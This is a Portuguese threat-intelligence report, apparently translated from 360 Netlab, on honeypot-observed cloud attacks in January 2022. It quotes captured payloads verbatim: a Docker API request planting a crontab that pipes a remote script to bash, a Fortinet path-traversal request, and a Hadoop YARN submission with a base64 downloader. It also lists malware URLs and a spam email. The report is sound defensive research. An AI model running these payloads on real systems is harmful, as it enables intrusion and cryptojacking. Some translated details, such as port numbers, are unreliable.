1. Visão Geral
No primeiro mês de 2022, embora não haja novas vulnerabilidades quentes, e à medida que mais e mais vulnerabilidades do Apache Log4j2 dos dispositivos são corrigidas, o surto de vulnerabilidade do Apache Log4j2 que começou em dezembro também chegou ao fim, e o número de ataques relacionados fontes diminuiu significativamente. No entanto, o número de IPs de origem de ataque ao servidor em nuvem de vulnerabilidades antigas, como vulnerabilidade de acesso não autorizado à API remota do Docker e vulnerabilidade de leitura arbitrária não autorizada de arquivos do Fortinet FortiOS, aumentou repentinamente significativamente em comparação com dezembro. Na Parte 2, analisamos as tendências de ataque e os métodos de ataque dessas duas vulnerabilidades. Em termos de ativos de nuvem do governo, empresas e instituições, um total de 26 ataques de varredura externa em ativos de nuvem foram descobertos em janeiro. Entre eles, o IP do servidor de nuvem usado por uma unidade de pesquisa aeroespacial, um hospital popular municipal (todos configurado no Alibaba Cloud) e outras unidades O lançamento de um ataque à Internet pública é digno de atenção. Este artigo analisa principalmente os detalhes de ataques de vulnerabilidades populares na nuvem do ângulo do honeypot Anglerfish do 360 Network Security Research Institute, bem como o ataque à rede pública de ativos importantes na nuvem.
–
2. Principais ameaças de ataque de vulnerabilidade na nuvem
Nenhum novo exploit surgiu este mês, mas vale a pena notar que o número de IPs de origem de ataque com alguns exploits antigos este mês aumentou significativamente em relação a dezembro. O maior crescimento foi a vulnerabilidade de acesso não autorizado da API remota do Docker e a vulnerabilidade de leitura de arquivo arbitrário não autorizado do Fortinet FortiOS. No entanto, o servidor em nuvem com a vulnerabilidade Apache Log4j2 que surgiu em dezembro foi reparado devido a mais e mais vulnerabilidades de dispositivos, e o número de IPs de origem de ataque caiu significativamente.
2.1 Vulnerabilidade de acesso não autorizado da API remota do Docker
No Docker, você pode interagir com a API remota por meio da linha de comando. A API remota do Docker escuta na porta 2735/2736 por padrão. Quando configurada corretamente, a API Remota só é acessível via localhost. Os contêineres podem ser implantados e controlados automaticamente por meio da API remota do Docker. No entanto, quando o Docker é configurado incorretamente e a API remota é exposta na rede pública, ela pode ser explorada maliciosamente por invasores para causar RCE.
O invasor inicia um contêiner por meio da API remota exposta, executa o docker run –privileged e, em seguida, monta o diretório do host no contêiner, realiza leitura e gravação arbitrária de arquivos do host e recupera o shell gravando comandos no arquivo de configuração crontab.
O ataque de acesso não autorizado à API remota do Docker visa principalmente as portas TCP/2375 e TCP/2376 da máquina de destino.
O malware que se espalha é principalmente a mineração maliciosa (CoinMiner) e o malware Rootkit.
Os principais URIs de ataque e suas porcentagens são os seguintes:
/v1.24/containers/create (50%)
/_ping (29%)
/v1.24/containers/json (13%)
/v1.37/containers/create (3%)
Exemplo de carga útil de ataque:
POST /v1.24/containers/create HTTP/1.1
Host: {target}
User-Agent: Go-http-client/1.1
Content-Length: 1787
Content-Type: application/json
Accept-Encoding: gzip
{"Hostname":"","Domainname":"","User":"","AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":[],"Cmd":["chroot","/mnt/","/bin/sh","-c","if ! type curl \u003e/dev/null;then apt-get install -y curl;apt-get install -y --reinstall curl;yum clean all;yum install -y curl;yum reinstall -y curl;fi;echo \"* * * * * root curl http://107.189.3.150/b2f628/cronb.sh|bash\"\u003e/etc/crontab \u0026\u0026 echo \"* * * * * root curl http://107.189.3.150/b2f628/cronb.sh|bash\"\u003e/etc/cron.d/zzh"],"Image":"alpine","Volumes":{},"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":{},"HostConfig":{"Binds":["/:/mnt"],"ContainerIDFile":"","LogConfig":{"Type":"","Config":{}},"NetworkMode":"default","PortBindings":{},"RestartPolicy":{"Name":"no","MaximumRetryCount":0},"AutoRemove":true,"VolumeDriver":"","VolumesFrom":null,"CapAdd":null,"CapDrop":null,"Dns":[],"DnsOptions":[],"DnsSearch":[],"ExtraHosts":null,"GroupAdd":null,"IpcMode":"","Cgroup":"","Links":null,"OomScoreAdj":0,"PidMode":"","Privileged":false,"PublishAllPorts":false,"ReadonlyRootfs":false,"SecurityOpt":null,"UTSMode":"","UsernsMode":"","ShmSize":0,"ConsoleSize":[0,0],"Isolation":"","CpuShares":0,"Memory":0,"NanoCpus":0,"CgroupParent":"","BlkioWeight":0,"BlkioWeightDevice":null,"BlkioDeviceReadBps":null,"BlkioDeviceWriteBps":null,"BlkioDeviceReadIOps":null,"BlkioDeviceWriteIOps":null,"CpuPeriod":0,"CpuQuota":0,"CpuRealtimePeriod":0,"CpuRealtimeRuntime":0,"CpusetCpus":"","CpusetMems":"","Devices":[],"DiskQuota":0,"KernelMemory":0,"MemoryReservation":0,"MemorySwap":0,"MemorySwappiness":-1,"OomKillDisable":false,"PidsLimit":0,"Ulimits":null,"CpuCount":0,"CpuPercent":0,"IOMaximumIOps":0,"IOMaximumBandwidth":0},"NetworkingConfig":{"EndpointsConfig":{}}}
Os IPs de origem de ataque estão concentrados na Tencent Cloud e no Alibaba Cloud, e esses dois provedores de serviços em nuvem respondem por cerca de 87% de todas as fontes de ataque de servidor em nuvem.
2.2 Vulnerabilidade de leitura arbitrária não autorizada de arquivo Fortinet FortiOS (CVE-2018-13379)
Na interface de login do dispositivo, ao solicitar o arquivo de idioma correspondente, o servidor constrói o caminho do arquivo de idioma JSON por meio do parâmetro lang fornecido: snprintf(s, 0x40, “/migadmin/lang/%s.json”, lang). Não há filtragem de caracteres especiais para o parâmetro lang, e o arquivo JSON é controlado para ser lido adicionando a extensão de arquivo .json. Mas a função snprintf grava no máximo strings de tamanho 1 no buffer de destino. Portanto, quando o comprimento do parâmetro lang exceder size-1 após a emenda, o .json será removido e, eventualmente, qualquer arquivo poderá ser lido.
/data/config/sys_global.conf.gz
/data/config/sys_vd_root.conf.gz
/data/config/global_system_interface.gz
/data/config/vd_root_firewall_policy.gz
/data/config/sys_vd_root%2broot.conf.gz
/dev/cmdb/sslvpn_websession
As portas de destino dos pacotes de ataque desta vulnerabilidade são relativamente dispersas e os pacotes de ataque de TCP/8443, TCP/9443 e TCP/4443 são relativamente grandes.
Os principais URIs de ataque e suas porcentagens são os seguintes:
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession (62%)
///remote/fgt_lang?lang=/../../../..//////////dev/ (38%)
Carga útil do ataque de vulnerabilidade:
GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1
Accept-Encoding: identity
Host: {target}
User-Agent: Python-urllib/3.9
Connection: close
Mais de 90% do IP de origem do ataque do servidor em nuvem dessa vulnerabilidade vem da Amazon AWS, que também é muito concentrada.
3. Situação de ataques de varredura externa por ativos na nuvem
Em janeiro de 2022, foram encontrados um total de 26 ativos em nuvem de importantes governos, empresas e instituições nacionais que lançaram ataques de varredura externa, dos quais instituições públicas e agências governamentais representavam 90%, e o provedor de serviços em nuvem era principalmente o Alibaba Cloud. A seguir, descreve-se a situação de duas dessas unidades. Se você precisar de informações mais relevantes, entre em contato conosco de acordo com as informações de contato no final do artigo.
Um IP pertence a 39.96.91.* do Alibaba Cloud, e a localização do IP está localizada em Pequim. Pertence a uma importante unidade de pesquisa relacionada a sistemas aeroespaciais e navegação. Em 17 de janeiro, o cracking de força bruta SSH foi lançado no sistema honeypot:
SSH-2.0-libssh_0.9.6
knockknockwhosthere
knockknockwhosthere
Acesse o endereço IP diretamente com um navegador para entrar na página inicial da unidade:
O outro é o Alibaba Cloud 47.108.242.*, cujo endereço IP está localizado em Chengdu, Sichuan, e pertence a um hospital popular municipal. Acesse este endereço IP diretamente com um navegador e você pode entrar no sistema de consulta de resultados de teste de ácido nucleico do hospital.
Este IP explora a vulnerabilidade de acesso não autorizado Hadoop YARN ResourceManager, a vulnerabilidade RCE do modo de depuração do Laravel (CVE-2021-3129) e a vulnerabilidade RCE do ThinkPHP. O malware semelhante ao TrojanDownloader se espalha pelo sistema Linux. O URL de download do malware é:
http://194.145.227.21/ldr.sh
Carga útil vulnerável de acesso não autorizado do Hadoop YARN ResourceManager:
POST /ws/v1/cluster/apps HTTP/1.1
Host: {target}:8088
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Content-Length: 3302
Accept: */*
Accept-Language: en-US,en;q=0.5
Connection: close
Content-Type: application/json
Accept-Encoding: gzip
{
"application-id": "application_1526990652950_72948",
"application-name": "eqtrl5an",
"am-container-spec": { "commands": { "command": "echo Yz1odHRwOi8vMTk0LjE0NS4yMjcuMjEvbGRyLnNoP2Y5ZWRhYQpleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmZvciBpIGluICQocHMgLWVmIHwgZ3JlcCBhdGxhc3NpYW4gfCBhd2sgJ3twcmludCAkMn0nKTsgZG8KICBpZiBscyAtYWwgL3Byb2MvJGkgfCBncmVwIGV4ZSB8IGdyZXAgIi91c3IvYmluL3BlcmxcfC9kZXYvc2htIjsgdGhlbgogICAga2lsbCAtOSAkaQogIGZpCmRvbmUKCnBraWxsIC05IHJ1bXBvc3RncmVzd2sKcGtpbGwgLTkgLWYgJ1wuL1wuJwpwa2lsbCAtOSAtZiAnL3RtcC9cLicKcGtpbGwgLTkgLWYga2VybmVseApwa2lsbCAtOSAtZiBwb3N0Z3Jlcy1zeXN0ZW0KCnBraWxsIC05IC1mIHBvc3RncmVzLWtlcm5lbAoKaWYgWyAhIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIC1hICEgLXggIiQoY29tbWFuZCAtdiB3Z2V0KSIgXTsgdGhlbgogIGNkIC90bXAgfHwgY2QgL3Zhci90bXAKICBjaGF0dHIgLWkgZDsgY2hhdHRyIC1pIGRscjsgcm0gLXJmIGQgZGxyCiAgZWNobyBmMFZNUmdFQkFRQUFBQUFBQUFBQUFBSUFBd0FCQUFBQUpJTUVDRFFBQUFETUF3QUFBQUFBQURRQUlBQURBQ2dBQlFBRUFBRUFBQUFBQUFBQUFJQUVDQUNBQkFpckF3QUFxd01BQUFVQUFBQUFFQUFBQVFBQUFLd0RBQUNza3dRSXJKTUVDQUFBQUFBRUFBQUFCZ0FBQUFBUUFBQlI1WFJrQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBR0FBQUFCQUFBQUZXSjVRKzJWUWdQdGtVTUQ3Wk5FTUhpR01IZ0VBbkNEN1pGRk1IaENGMEp3Z25SaWNxSnlJSGlBUDhBQU1IaUNNSGdHQW5RaWNxQjRRQUEvd0RCNmhqQjZRZ0p5Z25RdzFXSjVZUHNFUDkxQ0dvQjZFUUNBQUNEeEJESncxV0o1WVBzRVA5MUNHb0c2QzhDQUFESncxV0o1WVBzQ1A5MUVQOTFEUDkxQ0dvRjZCY0NBQURKdzFXSjVZUHNISXRGQ0lsRjlJdEZESWxGK0l0RkVJbEYvSTFGOUZCcUEycG02UEFCQUFESncxV0o1WVBzQ1A5MUVQOTFEUDkxQ0dvRTZOZ0JBQURKdzFXSjVZUHNDUDkxRVA5MURQOTFDR29ENk1BQkFBREp3MVdKNVlQc0hJdEZDSWxGOUl0RkRJbEYrSXRGRUlsRi9JMUY5RkJxQVdwbTZKa0JBQURKdzFXNGZZTUVDSW5sVjFaVGdleXNBQUFBNndGQWdEZ0FkZm90ZllNRUNJbUZVUC8vLzFCcUFtaURnd1FJYWdIb2R2Ly8vMm9WYU9NQUFBQm9rUUFBQUdqQ0FBQUFac2RGNEFJQVpzZEY0Z0JRNktiKy8vK0R4QnhvL3dFQUFHaEJBZ0FBYUlhREJBaUpSZVRvKy83Ly80UEVER29BYWdGcUFvbkg2RnIvLy8rRHhCQ0QrUCtKeG5RRmcvLy9kUTJEN0F4cUFlaXIvdi8vZzhRUVVHb1FqVVhnVUZibzJ2Ny8vNFBFRUlYQWljTjVIRkQzMjJvQmFJcURCQWhxQWVqbi92Ly9pUndrNkhuKy8vK0R4QkNMblZELy8vOVFnOE1YVTJpTWd3UUlWdWpHL3YvL2c4UVFPZGgwRFlQc0RHb0Q2RS8rLy8rRHhCQXgyMUJxQVkxRjgxQlc2THYrLy8rRHhCQklkQTJEN0F4cUJPZ3Qvdi8vZzhRUUQ3NUY4OEhqQ0FuRGdmc0tEUW9OZGM5UmFJQUFBQUNObldELy8vOVRWdWlFL3YvL2c4UVFoY0IrRGxKUVUxZm9YUDcvLzRQRUVPdllnK3dNVnVqOS9mLy9pVHdrNlBYOS8vK0R4QXhxQVdpcGd3UUlhZ0hvTmY3Ly84Y0VKQVVBQUFEb3cvMy8vNFBFRUkxbDlGdGVYMTNEVllubFhlbHMvdi8va0pDUVZWZFdVNHRzSkN5TGZDUW9pM1FrSkl0VUpDQ0xUQ1FjaTF3a0dJdEVKQlROZ0Z0ZVgxMDlBZkQvL3crREFRQUFBTU9EN0F5Snd2ZmE2QWtBQUFDSkVJUEkvNFBFRE1PNHJKTUVDTU5oYldRMk5BQWpDZ0JrYkhJQVB3QkhSVlFnTDJOMWNtd3RZVzFrTmpRZ1NGUlVVQzh4TGpBTkNnMEtBQ01BQUFBdWMyaHpkSEowWVdJQUxuUmxlSFFBTG5KdlpHRjBZUUF1WW5OekFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFzQUFBQUJBQUFBQmdBQUFKU0FCQWlVQUFBQTZRSUFBQUFBQUFBQUFBQUFCQUFBQUFBQUFBQVJBQUFBQVFBQUFESUFBQUI5Z3dRSWZRTUFBQzRBQUFBQUFBQUFBQUFBQUFFQUFBQUJBQUFBR1FBQUFBZ0FBQUFEQUFBQXJKTUVDS3dEQUFBRUFBQUFBQUFBQUFBQUFBQUVBQUFBQUFBQUFBRUFBQUFEQUFBQUFBQUFBQUFBQUFDc0F3QUFIZ0FBQUFBQUFBQUFBQUFBQVFBQUFBQUFBQUE9fGJhc2U2NCAtZCA+IGQKICBjaG1vZCAreCBkOyAuL2R8fC4vZDsgcm0gLWYgZDsgY2htb2QgK3ggZGxyCmZpCgooY3VybCAkYyB8fCBjdXJsICRjIHx8IHdnZXQgLXEgLU8tICRjIHx8IGN1cmwgLWsgJGMgfHwgY3VybCAtayAkYyB8fCB3Z2V0IC0tbm8tY2hlY2stY2VydGlmaWNhdGUgLXEgLU8tICRjIHx8IC4vZGxyICRjIHx8IC4vZGxyICRjKXxzaAo=|base64 -d|sh" } },
"application-type": "YARN"
}
4. A situação geral dos ataques lançados por servidores em nuvem em dezembro
Em janeiro de 2022, o sistema honeypot Anglerfish do 360 Network Security Research Institute monitorou um total de 157 milhões de sessões de rede enviadas por 67.373 servidores em nuvem globais, um aumento em relação a dezembro. Entre eles, há 19.356 IPs para verificação de vulnerabilidades e comportamentos de ataque, 11.358 IPs para brute force cracking e 5.148 IPs para disseminação de malware. Tencent Cloud, DigitalCloud, Alibaba Cloud, Amazon AWS e Microsoft Azure são os 5 principais provedores de serviços em nuvem em termos de número de IPs de origem. O IP da DigitalOcean tem o maior número de sessões totais devido ao cracking de força bruta.
O número de IPs que lançaram ataques de vulnerabilidade é mostrado na figura acima As vulnerabilidades do Redis ainda são as vulnerabilidades mais usadas em ataques relacionados a servidores em nuvem. O número de IPs de origem de ataque para a vulnerabilidade de acesso não autorizado da API remota do Docker aumentou significativamente em janeiro, ficando em terceiro lugar.
Conforme mostrado na figura, Alibaba Cloud, Tencent Cloud e DigitalOcean têm o maior número de IPs de origem para espalhar malware.
O malware de mineração malicioso ainda é o tipo mais popular de malware em servidores em nuvem.
Os seguintes nomes de domínio ou IPs de servidor de download são usados por mais de 100 IPs de origem de ataque de servidor em nuvem.
Em termos de disseminação de spam e phishing, existe um servidor LeaseWeb 213.227.155.122 localizado na Holanda que enviou 182 e-mails de spam, sendo todos os seguintes:
Dear Sir/Ma,
How are you doing today,I hope you are in good health. I have intended to lay down your name as the beneficiary of an overdue inheritance fund here in a china bank where I work as a banker. Also I want to invest part of this fund in your country under your supervision. Kindly get back to me for further details on the project of mutual benefit.
Yours Sincerely,
Fund Allocation Officer.
Ecitic Bank of China.
Em termos de ataques de explosão de senhas, os protocolos detonados focam principalmente em SSH, Telnet, FTP e PostgreSQL.Além disso, alguns serviços do protocolo HTTP, como Yealink Servlet e phpMyAdmin, também possuem ataques de explosão.
A DigitalOcean ficou em primeiro lugar no número de IPs de ataque explosivo e no número de sessões, seguida pela Tencent Cloud, Alibaba Cloud e Amazon AWS.
5. Recomendações de proteção
Este mês, o número de ataques à vulnerabilidade de acesso não autorizado da API remota do Docker aumentou significativamente. Recomenda-se que os usuários do Docker na nuvem tomem as seguintes medidas de proteção:
1) A menos que seja necessário para os negócios, feche o TCP/2375 e o TCP/2376 portas na rede pública.
2) Defina regras de acesso estritas para portas TCP/2375 e TCP/2376 e exija o uso de criptografia TLS.
3) Atualize para a versão mais recente do Docker
4) Acesse inteligência de ameaças de alta precisão em produtos de segurança na nuvem.
6. Entre em contato conosco
Os leitores interessados podem entrar em contato conosco em netlab[at]360.cn.
7. Lista de IoC
URL:
http://oracle.zzhreceive.top/b2f628/cronb.sh
http://oracle.zzhreceive.top/b2f628fff19fda999999999/cronis.sh
http://58.226.35.74/tmate
http://58.226.35.74/midd.jpg
http://194.38.20.242/d.sh
http://194.38.20.242/kinsing
http://oracle.zzhreceive.top/b2f628fff19fda999999999/dk.sh
http://oracle.zzhreceive.top/b2f628/dkb.sh
http://oracle.zzhreceive.top/b/apa.jpg
md5:
fcdfd7cc3ba35aec23dd39038b161f41
f1c1406a1713f3213276aee6f2f4d0ee
84a5ad559fb6214ed41ab6d5148e6fa2
10ac30ebbed68584400f8ccd814e2a60
1499f91b33a02f33a82c7fd756f445f7
a06f97d208b2dce7f5373538d840fe4f
429df5b7a8c2e3852dddf73df2bcdd3a
896218a845b85c6e6c7260f3ded1c7d5
0d8d3a2e0dcd7031b67707e446799d61
8f90ab85461c0e37b687e7365dc095f5
360 Advanced Threat Institute
O 360 Advanced Threat Research Institute é o departamento de suporte de competência central do 360 Government and Enterprise Security Group. É composto por 360 especialistas de segurança sênior. Ele se concentra na descoberta, defesa, eliminação e pesquisa de ameaças avançadas. Ele assumiu a liderança na captura mortes duplas, estrelas duplas e pesadelos em escala global. Fórmula e muitos outros ataques de 0 dias bem conhecidos no campo revelaram com exclusividade as ações avançadas de várias organizações APT nacionais, conquistaram amplo reconhecimento da indústria e do exterior e forneceram forte apoio para 360 para garantir a segurança da rede nacional.
Fonte: 360 Advanced Threat Institute
Descubra mais sobre DCiber
Assine para receber os posts mais recentes por e-mail.
